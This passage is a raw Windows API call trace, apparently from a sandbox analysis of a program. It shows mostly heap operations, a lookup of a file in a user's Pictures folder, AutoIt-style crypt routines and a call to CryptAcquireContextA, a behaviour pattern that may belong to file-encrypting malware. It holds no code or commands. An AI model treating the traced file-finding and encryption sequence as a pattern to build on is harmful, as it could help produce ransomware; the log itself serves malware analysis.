0x2e514d8 [0253.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0253.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0253.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0253.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0253.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0253.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0253.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.831] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/TbPkae.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f56ed0, ftCreationTime.dwHighDateTime=0x1d5e570, ftLastAccessTime.dwLowDateTime=0xf735c220, ftLastAccessTime.dwHighDateTime=0x1d5eee3, ftLastWriteTime.dwLowDateTime=0xf735c220, ftLastWriteTime.dwHighDateTime=0x1d5eee3, nFileSizeHigh=0x0, nFileSizeLow=0x13182, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="TbPkae.gif", cAlternateFileName="")) returned 0xa872d0 [0253.831] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0253.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0253.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0253.832] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.832] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0253.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0253.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0253.833] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0253.833] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0253.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0253.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.834] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.834] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.834] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0253.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0253.835] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d58 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.835] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.835] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0253.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0253.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.837] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.837] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0253.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.837] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0253.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0253.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0253.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0253.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0253.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.838] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0253.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0253.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: 